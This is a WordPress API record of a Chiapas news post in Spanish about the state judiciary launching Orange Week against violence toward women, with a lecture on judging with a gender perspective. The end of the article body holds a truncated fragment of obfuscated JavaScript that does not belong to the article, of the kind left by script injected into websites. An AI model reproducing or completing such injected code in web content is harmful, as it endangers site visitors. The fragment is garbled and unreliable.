{"id":7016,"date":"2022-11-28T04:00:09","date_gmt":"2022-11-28T04:00:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7016"},"modified":"2022-11-28T04:00:10","modified_gmt":"2022-11-28T04:00:10","slug":"inicia-poder-judicial-acciones-de-la-semana-naranja-con-conferencia-magistral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7016","title":{"rendered":"Inicia Poder Judicial acciones de la Semana Naranja con conferencia magistral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"452\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669607225135.jpg\" alt=\"\" class=\"wp-image-7018\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669607225135.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669607225135-300x188.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Se fortalece el combate a la violencia de g\u00e9nero desde los \u00f3rganos Impartidores de justicia<\/li>\n<\/ul>\n\n\n\n<p>El Poder Judicial del Estado de Chiapas, en cumplimiento a los trabajos de la Asociaci\u00f3n Mexicana de Impartidores de Justicia (AMIJ) y en seguimiento a las buenas pr\u00e1cticas como instituci\u00f3n certificada en la Norma Mexicana 025 en Igualdad Laboral y No discriminaci\u00f3n, inicia las actividades de la Semana Naranja, conmemorando el D\u00eda Internacional de la Eliminaci\u00f3n de la Violencia contra las Mujeres y las Ni\u00f1as.<\/p>\n\n\n\n<p>En este sentido, el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, instruy\u00f3 la realizaci\u00f3n de una serie de acciones de sensibilizaci\u00f3n, a trav\u00e9s de la Direcci\u00f3n de Equidad de G\u00e9nero y Derechos Humanos, para poner fin a la violencia contra las mujeres, que contempla la adhesi\u00f3n a la campa\u00f1a \u00danete de aqu\u00ed al 2030 de Naciones Unidas.<\/p>\n\n\n\n<p>Adem\u00e1s, se realiz\u00f3 la conferencia magistral: Elementos B\u00e1sicos para Juzgar con Perspectiva de G\u00e9nero, impartida por la magistrada de Circuito adscrita al Primer Tribunal Colegiado en Materia Administrativa del Segundo Circuito y directora nacional de G\u00e9nero en la Asociaci\u00f3n Nacional de Magistrados de Circuito y Jueces de Distrito del Poder Judicial de la Federaci\u00f3n, Julia Mar\u00eda del Carmen Garc\u00eda Gonz\u00e1lez.<\/p>\n\n\n\n<p>En este evento con la representaci\u00f3n del magistrado presidente, las consejeras de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, destacaron la participaci\u00f3n no s\u00f3lo del personal jurisdiccional, sino tambi\u00e9n del administrativo, a quienes instaron a aprovechar la jornada puesto que la perspectiva de g\u00e9nero es una herramienta fundamental en la administraci\u00f3n de justicia, como parte del proyecto democr\u00e1tico de la eliminaci\u00f3n de la desigualdad y la discriminaci\u00f3n.<\/p>\n\n\n\n<p>A\u00f1adieron un profundo agradecimiento por el apoyo y la coordinaci\u00f3n del Consejo de la Judicatura Federal, y de la Asociaci\u00f3n Nacional de Magistrados de Circuito y Jueces de Distrito del Poder Judicial de la Federaci\u00f3n, ya que es tarea de todos y todas, pero mas a\u00fan de quienes prestan un servicio p\u00fablico, atender el flagelo de la violencia contra la mujer y abonar desde las distintas trincheras a su erradicaci\u00f3n.<\/p>\n\n\n\n<p>En el desarrollo de la conferencia, la magistrada Garc\u00eda Gonz\u00e1lez plasm\u00f3 el contexto hist\u00f3rico del patriarcado en nuestra sociedad y su relaci\u00f3n con las condiciones de desigualdad hacia la mujer, como base de la violencia ejercida en su contra, y concluy\u00f3 con los elementos metodol\u00f3gicos para aplicar la perspectiva de g\u00e9nero en la impartici\u00f3n de justicia, como el identificar si existen situaciones de poder que por cuestiones de g\u00e9nero, impliquen un desequilibrio entre las partes, cuestionar la neutralidad del derecho aplicable, as\u00ed como atender el inter\u00e9s superior de la ni\u00f1ez y evitar en todo momento, lenguaje sexista o estereotipado.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial en Chiapas fortalece la visi\u00f3n igualitaria de las personas, a trav\u00e9s de la capacitaci\u00f3n, para evitar la reproducci\u00f3n de estereotipos de g\u00e9nero y su impacto en el acceso a la justicia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Se fortalece el combate a la violencia de g\u00e9nero desde los \u00f3rganos Impartidores de justicia El Poder Judicial del Estado de Chiapas, en cumplimiento a los trabajos de la Asociaci\u00f3n Mexicana de Impartidores de Justicia (AMIJ) y en seguimiento a las buenas pr\u00e1cticas como instituci\u00f3n certificada en la Norma Mexicana 025 en Igualdad Laboral y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7018,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7016","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7016","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7016"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7016\/revisions"}],"predecessor-version":[{"id":7019,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7016\/revisions\/7019"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7018"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7016"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7016"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7016"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}